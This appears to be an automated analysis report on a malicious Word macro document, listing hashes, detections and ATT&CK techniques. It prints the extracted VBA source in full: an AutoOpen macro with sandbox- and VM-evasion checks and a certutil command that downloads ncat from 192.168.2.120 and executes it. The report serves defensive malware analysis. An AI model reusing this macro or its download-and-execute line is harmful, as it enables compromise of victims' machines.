Office (OOXML) malware analysis — malicious · f4e05c22a97df1f3

MALICIOUS

Office (OOXML)

20.6 KB Created: 2021-06-03 14:32:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-13

MD5: fce79880a271ccc3d56bf692a639c184 SHA-1: 8a09218fbdbcbeb18a3bc1d97c900f58e2eca185 SHA-256: f4e05c22a97df1f3cd1f777b8a9ad410e2f9b04edd7f1e6319652784c75a43b7

430 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is a malicious OOXML document containing VBA macros. The AutoOpen macro executes cmd.exe using WScript.Shell, which is a common technique for downloading and executing further payloads. The ClamAV detection name 'Win.Downloader.CertutilURLCache-6335698-0' further supports this behavior. The script also contains checks for specific filenames and virtual machine artifacts, indicating an attempt to evade detection.

Heuristics 10

ClamAV: Win.Downloader.CertutilURLCache-6335698-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Downloader.CertutilURLCache-6335698-0
VBA project inside OOXML medium 7 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

        Dim objShell
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA

Matched line in script

        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

        Dim objShell
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)

cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA

Matched line in script

        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe"

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://192.168.2.120/ncat1.exe In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2390 bytes
SHA-256: `38548ab29bc465f90d075d6b5c155e80db7b94430a5534d76fa9bfd30015ed09`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub AutoOpen() Dim i badCores = 0 Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48) For Each objItem In colItems If objItem.NumberOfCores < 3 Then badCores = True End If Next If badCores = True Then i = 1 Else checkPreciseFileName End If End Sub Private Function MSG() 'Sub MSG() MsgBox ("TEST") End Function Public Sub checkPreciseFileName() 'MsgBox "[] Checking Precise Filename ..." badName = False If ActiveDocument.Name <> "certutil2_12_64_only_certutil_TEST2_cores_exact_filename.docm" Then badName = True End If If badName Then i = 1 'MsgBox "DETECTED" Else checkTasks 'MsgBox "OK" End If End Sub Public Sub checkTasks() 'printMsg "[] Checking Application.Tasks.Name ..." badTask = False badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler") ' badTaskNames = Array("fiddler", "vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer") 'badTaskNames = Array("visual basic") For Each Task In Application.Tasks For Each badTaskName In badTaskNames If InStr(LCase(Task.Name), badTaskName) > 0 Then badTask = True End If Next Next If badTask Then MsgBox "DETECTED" Else Dim objShell Set objShell = CreateObject("WScript.Shell") objShell.Run "cmd.exe /c certutil.exe -urlcache -split -f http://192.168.2.120/ncat1.exe c:\Users\win\ncat2.exe && c:\Users\win\ncat2.exe" End If End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	22016 bytes
SHA-256: `40519c573e1c900fefff8fbb1349edc397f4b31662ae0d8310d56385ffc819f9`
Detection ClamAV: Win.Downloader.CertutilURLCache-6335698-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.